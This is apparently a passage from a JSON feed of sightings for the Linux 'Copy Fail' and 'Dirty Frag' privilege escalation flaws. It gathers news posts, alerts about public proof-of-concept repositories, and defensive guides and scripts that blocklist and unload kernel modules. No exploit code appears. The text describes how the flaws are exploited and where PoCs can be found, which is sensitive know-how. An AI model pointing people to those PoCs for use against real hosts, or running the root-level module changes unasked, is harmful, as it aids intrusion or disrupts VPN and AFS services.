\u0434\u0440\u0443\u0433\u0438\u0445.\n\n\u041a\u0430\u043a \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f? \ud83d\udd27\n\n\u0422\u0430\u043a \u043a\u0430\u043a \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0430\u0442\u0447\u0430 \u043e\u0442 \u043c\u0435\u0439\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432 \u044f\u0434\u0440\u0430 \u043f\u043e\u043a\u0430 \u043d\u0435\u0442, \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u0437\u0430\u0449\u0438\u0442\u044b \u2014 \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0438 \u0432\u044b\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u043c\u043e\u0434\u0443\u043b\u0438 \u044f\u0434\u0440\u0430.\n\n\u041a\u043e\u043c\u0430\u043d\u0434\u0430 \u0434\u043b\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f:\n\nsh -c \"printf 'install esp4 /bin/false\\ninstall esp6 /bin/false\\ninstall rxrpc /bin/false\\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true\"\n\n\u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, AlmaLinux) \u043d\u0430\u0447\u0430\u043b\u0438 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043f\u0430\u0442\u0447\u0438, \u043d\u0435 \u0434\u043e\u0436\u0438\u0434\u0430\u044f\u0441\u044c \u0430\u043f\u0441\u0442\u0440\u0438\u043c\u0430.\n\n#avlab #cve #linux #sandbox\n@ptescalator (X, Max)", "creation_timestamp": "2026-05-08T09:08:22.000000Z"}, {"uuid": "f34800b1-8526-44be-a8bc-6a4496c43b19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://thehackernews.com/2026/05/linux-kernel-dirty-frag-lpe-exploit.html", "content": "Details have emerged about a new, unpatched local privilege escalation (LPE) vulnerability impacting the Linux kernel.\nDubbed Dirty Frag, it has been described as a successor to Copy Fail (CVE-2026-31431, CVSS score: 7.8), a recently disclosed LPE flaw impacting the Linux kernel that has since come under active exploitation in the wild. The vulnerability was reported to Linux kernel maintainers", "creation_timestamp": "2026-05-08T03:12:00.000000Z"}, {"uuid": "5571b4bd-cecd-4183-833c-b59a7ebb8658", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mldw6s3wu22t", "content": "6/ \ud83d\udd25 Patch now: Palo Alto PAN-OS CVE-2026-0300 (CVSS 9.3) under active exploitation since April 9. Unauthenticated RCE as root. CISA-listed Linux \"Copy Fail\" CVE-2026-31431 due May 15.", "creation_timestamp": "2026-05-08T14:16:05.441154Z"}, {"uuid": "57227c9f-ecd1-4046-b85d-586f0135ef97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mldw6s46o22t", "content": "6/ \ud83d\udd25 Patch now: Palo Alto PAN-OS CVE-2026-0300 (CVSS 9.3) under active exploitation since April 9. Unauthenticated RCE as root. CISA-listed Linux \"Copy Fail\" CVE-2026-31431 due May 15.", "creation_timestamp": "2026-05-08T14:16:06.165171Z"}, {"uuid": "de7122a5-4b38-4192-9ec7-d59bbc299cb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mldw6s47nc2t", "content": "6/ \ud83d\udd25 Patch now: Palo Alto PAN-OS CVE-2026-0300 (CVSS 9.3) under active exploitation since April 9. Unauthenticated RCE as root. CISA-listed Linux \"Copy Fail\" CVE-2026-31431 due May 15.", "creation_timestamp": "2026-05-08T14:16:06.878951Z"}, {"uuid": "398b3342-74f3-446e-ad6a-4e4c118ac68a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mldw6s4amk2t", "content": "6/ \ud83d\udd25 Patch now: Palo Alto PAN-OS CVE-2026-0300 (CVSS 9.3) under active exploitation since April 9. Unauthenticated RCE as root. CISA-listed Linux \"Copy Fail\" CVE-2026-31431 due May 15.", "creation_timestamp": "2026-05-08T14:16:07.754050Z"}, {"uuid": "2c2e2071-1da5-4762-864b-c641704770f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mldw6s4aml2t", "content": "6/ \ud83d\udd25 Patch now: Palo Alto PAN-OS CVE-2026-0300 (CVSS 9.3) under active exploitation since April 9. Unauthenticated RCE as root. CISA-listed Linux \"Copy Fail\" CVE-2026-31431 due May 15.", "creation_timestamp": "2026-05-08T14:16:08.632422Z"}, {"uuid": "eab85636-b155-496d-9852-5a30b78e5762", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mldw6s4blt2t", "content": "6/ \ud83d\udd25 Patch now: Palo Alto PAN-OS CVE-2026-0300 (CVSS 9.3) under active exploitation since April 9. Unauthenticated RCE as root. CISA-listed Linux \"Copy Fail\" CVE-2026-31431 due May 15.", "creation_timestamp": "2026-05-08T14:16:09.364994Z"}, {"uuid": "fe9b3854-4e49-47a8-8748-ab2c5b8db96a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mldw6s4cl32t", "content": "6/ \ud83d\udd25 Patch now: Palo Alto PAN-OS CVE-2026-0300 (CVSS 9.3) under active exploitation since April 9. Unauthenticated RCE as root. CISA-listed Linux \"Copy Fail\" CVE-2026-31431 due May 15.", "creation_timestamp": "2026-05-08T14:16:10.157693Z"}, {"uuid": "22af4469-03e4-43d3-a7f3-8d14d15e9580", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mldw6s4cl42t", "content": "6/ \ud83d\udd25 Patch now: Palo Alto PAN-OS CVE-2026-0300 (CVSS 9.3) under active exploitation since April 9. Unauthenticated RCE as root. CISA-listed Linux \"Copy Fail\" CVE-2026-31431 due May 15.", "creation_timestamp": "2026-05-08T14:16:10.892616Z"}, {"uuid": "6452fd6f-1b17-4849-940b-603f315e83b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83368", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a MitigationToolkit-ROSN-LR5-Full\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ROSNLR5\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-08 14:58:29\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nKernel LPE PoC & Mitigation Toolkit - ROSN-LR5-Full (CVE-2026-31431)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-08T15:00:04.000000Z"}, {"uuid": "c87bbfcb-0d83-4cd2-94ce-797e7a0bf94a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/sayem314/6a33676059e6539501c55a978410795d", "content": "Copy Fail is a Linux kernel local privilege escalation in `algif_aead`, part of the AF_ALG userspace crypto API. If a vulnerable host runs untrusted local code, containers, CI jobs, app sandboxes, or shared shell users, treat it as urgent.\n\nThe real fix is a patched kernel from your distribution. The mitigation below blocks the affected module until you can patch and reboot.\n\nSources:\n\n- https://copy.fail/\n- https://ubuntu.com/blog/copy-fail-vulnerability-fixes-available\n- https://security-tracker.debian.org/tracker/CVE-2026-31431\n\n## Quick check\n\n```bash\nuname -r\ndpkg -l 'linux-image*' | grep '^ii'\ndpkg -l kmod | grep '^ii'\ngrep -qE '^algif_aead ' /proc/modules && echo \"algif_aead is loaded\" || echo \"algif_aead is not loaded\"\n```\n\nOn Ubuntu, Canonical also shipped a `kmod` mitigation for affected releases. Still update the kernel when your release has a fixed kernel package.\n\n```bash\nsudo apt update\nsudo apt install --only-upgrade kmod\nsudo apt full-upgrade\nsudo reboot\n```\n\n## Manual mitigation\n\nUse this when you cannot patch immediately, or when you want a fleet-wide safety block while waiting for kernel updates.\n\n```bash\nsudo tee /etc/modprobe.d/disable-algif_aead.conf >/dev/null <<'EOF'\ninstall algif_aead /bin/false\nEOF\n\nsudo modprobe -r algif_aead 2>/dev/null || true\n\ngrep -qE '^algif_aead ' /proc/modules && echo \"algif_aead is still loaded, reboot required\" || echo \"algif_aead is not loaded\"\nmodprobe -n -v algif_aead\n```\n\nExpected `modprobe -n -v algif_aead` output should include:\n\n```text\ninstall /bin/false\n```\n\nIf `algif_aead` is still loaded after `modprobe -r`, reboot the host. If you suspect the host was already exposed to untrusted local code, prefer a reboot after applying the mitigation or kernel update.\n\n## Ansible playbook\n\nSave as `copyfail-mitigate.yml`:\n\n```yaml\n---\n- name: Mitigate Copy Fail CVE-2026-31431\n  hosts: all\n  become: true\n  gather_facts: false\n\n  vars:\n    copyfail_module: algif_aead\n\n  tasks:\n    - name: Block algif_aead from loading\n      ansible.builtin.copy:\n        dest: \"/etc/modprobe.d/disable-{{ copyfail_module }}.conf\"\n        owner: root\n        group: root\n        mode: \"0644\"\n        content: |\n          install {{ copyfail_module }} /bin/false\n      register: copyfail_blacklist\n\n    - name: Unload algif_aead if currently loaded\n      community.general.modprobe:\n        name: \"{{ copyfail_module }}\"\n        state: absent\n      register: copyfail_unload\n      failed_when: false\n\n    - name: Check whether algif_aead is still loaded\n      ansible.builtin.shell: \"grep -qE '^{{ copyfail_module }} ' /proc/modules\"\n      register: copyfail_loaded\n      changed_when: false\n      failed_when: false\n\n    - name: Verify modprobe resolves algif_aead to /bin/false\n      ansible.builtin.command: \"modprobe -n -v {{ copyfail_module }}\"\n      register: copyfail_modprobe_check\n      changed_when: false\n\n    - name: Show mitigation status\n      ansible.builtin.debug:\n        msg:\n          - \"config_changed={{ copyfail_blacklist.changed }}\"\n          - \"module_unload_rc={{ copyfail_unload.rc | default('n/a') }}\"\n          - \"module_loaded={{ copyfail_loaded.rc == 0 }}\"\n          - \"modprobe_check={{ copyfail_modprobe_check.stdout }}\"\n\n    - name: Fail if algif_aead is still loaded\n      ansible.builtin.fail:\n        msg: \"algif_aead is still loaded. Reboot this host to complete mitigation.\"\n      when: copyfail_loaded.rc == 0\n```\n\nExample `inventory.yml`:\n\n```yaml\n---\nall:\n  children:\n    webservers:\n      hosts:\n        web-1:\n          ansible_host: 203.0.113.10\n          ansible_user: ubuntu\n        web-2:\n          ansible_host: 203.0.113.11\n          ansible_user: ubuntu\n    workers:\n      hosts:\n        worker-1:\n          ansible_host: 203.0.113.20\n          ansible_user: debian\n  vars:\n    ansible_become: true\n    ansible_python_interpreter: /usr/bin/python3\n```\n\nRun it:\n\n```bash\nansible-playbook -i inventory.yml copyfail-mitigate.yml\n```\n\nRun only a selected group:\n\n```bash\nansible-playbook -i inventory.yml copyfail-mitigate.yml --limit webservers\n```\n\n## Ansible role-style task\n\nIf you already have a common hardening role, put the module name in group vars:\n\n```yaml\ndisabled_kernel_modules:\n  - algif_aead\n```\n\nThen use this task block:\n\n```yaml\n- name: Block disabled kernel modules from loading\n  ansible.builtin.copy:\n    dest: \"/etc/modprobe.d/disable-{{ item }}.conf\"\n    owner: root\n    group: root\n    mode: \"0644\"\n    content: |\n      install {{ item }} /bin/false\n  loop: \"{{ disabled_kernel_modules | default([]) }}\"\n\n- name: Unload disabled kernel modules if currently loaded\n  community.general.modprobe:\n    name: \"{{ item }}\"\n    state: absent\n  loop: \"{{ disabled_kernel_modules | default([]) }}\"\n  failed_when: false\n```\n\n## What may break\n\nFor most Debian and Ubuntu servers, nothing noticeable. Normal TLS, SSH, LUKS, WireGuard, IPsec, OpenSSL, Docker networking, and web apps do not depend on `algif_aead`.\n\nPossible impact: software explicitly configured to use AF_ALG from userspace, such as OpenSSL with the `afalg` engine enabled or custom apps that open AF_ALG sockets directly. If unsure, check:\n\n```bash\nss -xa | grep -i alg || true\nlsof 2>/dev/null | grep AF_ALG || true\n```\n\n## Remove the manual mitigation later\n\nOnly do this after your running kernel is fixed and you have rebooted into it.\n\n```bash\nsudo rm /etc/modprobe.d/disable-algif_aead.conf\nsudo reboot\n```\n", "creation_timestamp": "2026-05-08T16:18:22.000000Z"}, {"uuid": "3d9ac7c1-e972-4c95-b3a8-8df9f762a6b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.cert.se/2026/05/cert-se-veckobrev-v19.html", "content": "", "creation_timestamp": "2026-05-08T06:10:00.000000Z"}, {"uuid": "6699f4fd-6155-4d2d-b1ea-9371da8c09b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/threatintel.microsoft.com/post/3mlebbbfqqs2p", "content": "Similar to the previously disclosed Copy Fail vulnerability (CVE-2026-31431), the exploit attempts to manipulate Linux page cache behavior to achieve privilege escalation. However, Dirty Frag introduces additional attack paths that expand exploitation opportunities and improve reliability.", "creation_timestamp": "2026-05-08T17:34:25.056560Z"}, {"uuid": "e7502325-77eb-4e41-863c-a5ad40f98e8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/threatintel.microsoft.com/post/3mlebbdebq22p", "content": "Similar to the previously disclosed Copy Fail vulnerability (CVE-2026-31431), the exploit attempts to manipulate Linux page cache behavior to achieve privilege escalation. However, Dirty Frag introduces additional attack paths that expand exploitation opportunities and improve reliability.", "creation_timestamp": "2026-05-08T17:34:25.662935Z"}, {"uuid": "9ee48f1c-8826-4d3e-8277-331e38694d35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83400", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43284\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a attaattaatta\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-08 18:44:58\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 + CVE-2026-43284 golang hotfix\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-08T19:00:04.000000Z"}, {"uuid": "6c32b47a-f672-42a6-868f-fa588b9a10d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kubonai.bsky.social/post/3mlelwpbn7e24", "content": "\ud83d\udcf0 CVE-2026-31431: \"Copy Fail\" Linux Kernel Privilege Escalation\n\nComplete breakdown of CVE-2026-31431 \n\n\ud83d\udd17 https://ipsec.live/blog/cve-2026-31431-copy-fail\n\n#infosec #cybersecurity #networking", "creation_timestamp": "2026-05-08T20:45:15.596106Z"}, {"uuid": "89f98550-8e4c-40a4-99c9-e3c255d433c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/almalinux.org/post/3mlelul4a7v2h", "content": "\u26a0\ufe0f PSA: patch your AlmaLinux systems. \n\nCopy Fail lets any local user escalate to root. We shipped fixes for AL 8, 9 & 10 ahead of upstream\u2014they're in production now. https://almalinux.org/blog/2026-05-01-cve-2026-31431-copy-fail/?utm_medium=social&utm_source=bluesky", "creation_timestamp": "2026-05-08T20:44:06.550945Z"}, {"uuid": "71968499-d7fe-48e6-82d7-3f9fc1596a0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kubonai.bsky.social/post/3mlelxqnws42c", "content": "CVE-2026-31431: \"Copy Fail\" Linux Kernel Privilege Escalation\n\nComplete breakdown of CVE-2026-31431 \n\n\ud83d\udd17 https://ipsec.live/blog/cve-2026-31431-copy-fail\n\n#infosec #cybersecurity", "creation_timestamp": "2026-05-08T20:45:50.462298Z"}, {"uuid": "5266b4f2-487a-4a53-90b4-1a0962bcd8fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kubonai.bsky.social/post/3mlem2334ku2q", "content": "CVE-2026-31431: \"Copy Fail\" Linux Kernel Privilege Escalation\n\nComplete breakdown of CVE-2026-31431 \n\n\ud83d\udd17 https://ipsec.live/blog/cve-2026-31431-copy-fail\n\n#infosec #cybersecurity", "creation_timestamp": "2026-05-08T20:47:08.467704Z"}, {"uuid": "006334e2-0a8a-47db-b368-a09ad0769c96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "Telegram/bpwD1lFGrjpZJE8nZPfkQ7he0n0Dc1Zua8DNoZEQncgtG5Y", "content": "", "creation_timestamp": "2026-05-08T15:00:06.000000Z"}, {"uuid": "60d93355-c4f2-4d76-956c-b118e2ae6fab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn-frontpage-bot.bsky.social/post/3mlen7cuskf22", "content": "A recent vulnerability, Copy Fail (CVE-2026-31431), allows local unprivileged users to gain root shells in Linux containers. While rootless Podman containers are susceptible, features like user namespaces, dropping capabilities, and disabling new privileges can significantly limit the exploit's i...", "creation_timestamp": "2026-05-08T21:07:58.159601Z"}, {"uuid": "b1d48be3-eaff-4579-9874-26f8d700d887", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/news.karthihegde.dev/post/3mleo6qhizm2r", "content": "CVE-2026-31431: Copy Fail\nDiscussion | lobsters | Author: fro", "creation_timestamp": "2026-05-08T21:25:32.880953Z"}, {"uuid": "b4053a83-932c-47a9-92db-5431588c4d98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/lobsters-feed.bsky.social/post/3mleoyobtbn27", "content": "CVE-2026-31431: Copy Fail https://lobste.rs/s/ksg1es #security #linux ", "creation_timestamp": "2026-05-08T21:40:04.683915Z"}, {"uuid": "13722a82-d794-4e75-a140-6ee2e35b56d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/83407", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a DIRTYFAIL\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a KaraZajac\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-08 19:58:21\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nDetector + PoC for Linux page-cache write vulnerabilities: Copy Fail (CVE-2026-31431) and Dirty Frag (CVE-2026-43284/43500). Authorized security research only.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-08T20:00:04.000000Z"}, {"uuid": "fc060951-4939-4911-8338-296cf6ec14d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/martijnengler/af7e9116199ba7e8e6e1df7d4ca2ebbc", "content": "#!/bin/sh\n\n# https://www.transip.nl/knowledgebase/controleren-of-je-vps-ipsecesp-xfrm-of-rxrpcafs-gebruikt\n# https://www.transip.nl/knowledgebase/copy-fail-cve-2026-31431-je-linux-vps-controleren-en-patchen/#Controleer-en-update-je-Linux-VPS\n\nset -eu\n\nCONF=/etc/modprobe.d/dirtyfrag.conf\n\nusage() {\n  echo \"Usage: $0 [--check|--disable|--revert]\"\n  exit 1\n}\n\nrun() {\n  echo \"+ $*\"\n  \"$@\"\n}\n\ncheck_ipsec() {\n  echo \"== IPsec / XFRM ==\"\n  echo \"-- xfrm state --\"\n  ip xfrm state || true\n  echo \"-- xfrm policy --\"\n  ip xfrm policy || true\n\n  echo \"-- loaded IPsec-related modules --\"\n  lsmod | egrep '^(esp4|esp6|xfrm_user|xfrm_algo|af_key)' || true\n\n  echo \"-- known IPsec services --\"\n  systemctl --type=service | egrep 'strongswan|libreswan|ipsec|racoon' || true\n\n  echo \"-- IKE / NAT-T ports --\"\n  ss -lunp | egrep ':(500|4500)\\b' || true\n}\n\ncheck_rxrpc_afs() {\n  echo\n  echo \"== RxRPC / AFS ==\"\n  echo \"-- loaded RxRPC/AFS modules --\"\n  lsmod | egrep '^(rxrpc|kafs|openafs)' || true\n\n  echo \"-- AFS processes --\"\n  ps aux | egrep 'afs|openafs|kafs' | grep -v grep || true\n\n  echo \"-- AFS services --\"\n  systemctl --type=service | egrep 'afs|openafs' || true\n}\n\ndisable_dirtyfrag() {\n  if [ \"$(id -u)\" -ne 0 ]; then\n    echo \"Run with sudo for --disable\"\n    exit 1\n  fi\n\n  echo \"Writing $CONF\"\n  cat > \"$CONF\" <<'EOF'\ninstall esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\nEOF\n\n  echo \"Unloading modules if currently loaded\"\n  rmmod esp4 esp6 rxrpc 2>/dev/null || true\n\n  echo \"Dropping page cache\"\n  sh -c 'echo 3 > /proc/sys/vm/drop_caches'\n\n  echo \"Done. Current relevant module status:\"\n  lsmod | egrep '^(esp4|esp6|rxrpc)' || echo \"OK: esp4/esp6/rxrpc not loaded\"\n}\n\nrevert_dirtyfrag() {\n  if [ \"$(id -u)\" -ne 0 ]; then\n    echo \"Run with sudo for --revert\"\n    exit 1\n  fi\n\n  rm -f \"$CONF\"\n  echo \"Removed $CONF\"\n  echo \"Reboot, or manually modprobe modules again if needed.\"\n}\n\nMODE=\"${1:---check}\"\n\ncase \"$MODE\" in\n  --check)\n    check_ipsec\n    check_rxrpc_afs\n    ;;\n  --disable)\n    check_ipsec\n    check_rxrpc_afs\n    echo\n    echo \"About to disable esp4, esp6, and rxrpc.\"\n    echo \"This can break IPsec VPNs and AFS/RxRPC.\"\n    printf \"Continue? [y/N] \"\n    read ans\n    case \"$ans\" in\n      y|Y|yes|YES) disable_dirtyfrag ;;\n      *) echo \"Aborted.\" ;;\n    esac\n    ;;\n  --revert)\n    revert_dirtyfrag\n    ;;\n  *)\n    usage\n    ;;\nesac", "creation_timestamp": "2026-05-08T17:50:09.000000Z"}, {"uuid": "8d3a4523-f9ad-42ad-b830-c11796a30a23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/nicolas17.xyz/post/3mleijak4qk24", "content": "Did you update your Linux kernel *again* to protect against the last privilege escalation bug?\n\nNo, not CopyFail (CVE-2026-31431), the new DirtyFrag (CVE-2026-43284, CVE-2026-43500).", "creation_timestamp": "2026-05-08T19:44:03.563348Z"}, {"uuid": "4f5da61c-ee48-4fe3-b543-43f46b6c1cbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlf77ax52d2i", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 202 interactions\nCVE-2026-0073: 79 interactions\nCVE-2026-41940: 66 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-0073: 66 interactions\nCVE-2026-43284: 61 interactions\nCVE-2026-7270: 32 interactions\n", "creation_timestamp": "2026-05-09T02:30:08.369234Z"}, {"uuid": "5f74684c-d7d8-49be-9376-1fdc5b34380b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/4NJNTXQkcEn5li8gJwvGdzAksckTW0TBP2bovQOhIHsVRA", "content": "", "creation_timestamp": "2026-05-08T08:06:31.000000Z"}, {"uuid": "14a0d784-06d0-4e26-a09a-414b4fbecb2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3mlfrjgkgbk2g", "content": "Another Universal Linux Local Privilege Escalation (LPE) Vulnerability: Dirty Frag, (Fri, May 8th)\n\nLess than two weeks after the public disclosure of the Copy Fail vulnerability (CVE-2026-31431), another local privilege escalation (LPE) vulnerability in the Linux kernel has been \u2026\n#hackernews #news", "creation_timestamp": "2026-05-09T07:57:52.699522Z"}, {"uuid": "33136d9d-3f4a-4bb7-9666-eaaf0ddfae0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83467", "content": "\ud83d\udea8 GitHub 